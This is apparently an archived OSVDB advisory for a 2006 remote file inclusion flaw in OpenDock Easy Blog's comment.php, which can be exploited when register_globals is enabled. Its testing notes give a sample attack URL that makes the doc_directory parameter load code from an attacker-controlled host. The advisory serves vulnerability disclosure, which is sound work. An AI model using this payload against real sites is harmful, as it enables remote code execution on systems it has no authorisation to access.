OpenDock Easy Blog sw/lib_comment/comment.php doc_directory Variable Remote File Inclusion

2006-10-09T07:34:59
ID OSVDB:29640
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2006-10-09T07:34:59

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://[attacker]/inject.txt?

References:

Vendor URL: http://web.opendock.net/ Security Tracker: 1017027 Secunia Advisory ID:22335 Related OSVDB ID: 29634 Related OSVDB ID: 29636 Related OSVDB ID: 29637 Related OSVDB ID: 29638 Related OSVDB ID: 29635 Related OSVDB ID: 29639 Related OSVDB ID: 29641 Related OSVDB ID: 29642 Other Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html Keyword: ECHO_ADV_50$2006 ISS X-Force ID: 29399 Generic Exploit URL: http://milw0rm.com/exploits/2495 FrSIRT Advisory: ADV-2006-3970 CVE-2006-5244 Bugtraq ID: 20408